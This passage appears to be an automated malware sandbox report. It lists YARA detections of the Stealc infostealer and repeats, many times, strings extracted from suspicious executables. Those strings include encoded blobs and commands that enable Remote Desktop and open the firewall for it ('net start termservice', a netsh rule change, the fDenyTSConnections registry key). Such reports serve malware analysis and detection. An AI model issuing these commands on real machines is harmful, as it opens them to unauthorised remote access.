                      Source: Yara matchFile source: 35.2.19be97887a.exe.e20000.0.unpack, type: UNPACKEDPE
                      Yara detected Stealc
                      Source: Yara matchFile source: 00000036.00000003.1948179949.0000000005440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.1814440673.0000000000EC1000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.1774138990.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000036.00000002.1990082511.0000000000EC1000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: bb5ad48269.exe PID: 5724, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: bb5ad48269.exe PID: 6960, type: MEMORYSTR
                      Contains functionality to start a terminal service
                      Source: 483d2fa8a0d53818306efeb32d3.exeString found in binary or memory: net start termservice
                      Source: 483d2fa8a0d53818306efeb32d3.exe, 00000011.00000002.993370074.0000000000301000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: net start termservice
                      Source: 483d2fa8a0d53818306efeb32d3.exe, 00000011.00000002.993370074.0000000000301000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                      Source: 483d2fa8a0d53818306efeb32d3.exe, 00000011.00000003.952949007.0000000004E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                      Source: 483d2fa8a0d53818306efeb32d3.exe, 00000011.00000003.952949007.0000000004E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                      Source: 483d2fa8a0d53818306efeb32d3.exeString found in binary or memory: net start termservice
                      Source: 483d2fa8a0d53818306efeb32d3.exe, 00000012.00000003.967837133.0000000004AF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                      Source: 483d2fa8a0d53818306efeb32d3.exe, 00000012.00000003.967837133.0000000004AF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                      Source: 483d2fa8a0d53818306efeb32d3.exe, 00000012.00000002.1009481063.0000000000301000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: net start termservice
                      Source: 483d2fa8a0d53818306efeb32d3.exe, 00000012.00000002.1009481063.0000000000301000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                      Source: rapes.exeString found in binary or memory: net start termservice
                      Source: rapes.exe, 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                      Source: rapes.exe, 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                      Source: rapes.exe, 00000013.00000002.1010976873.0000000000431000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: net start termservice
                      Source: rapes.exe, 00000013.00000002.1010976873.0000000000431000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 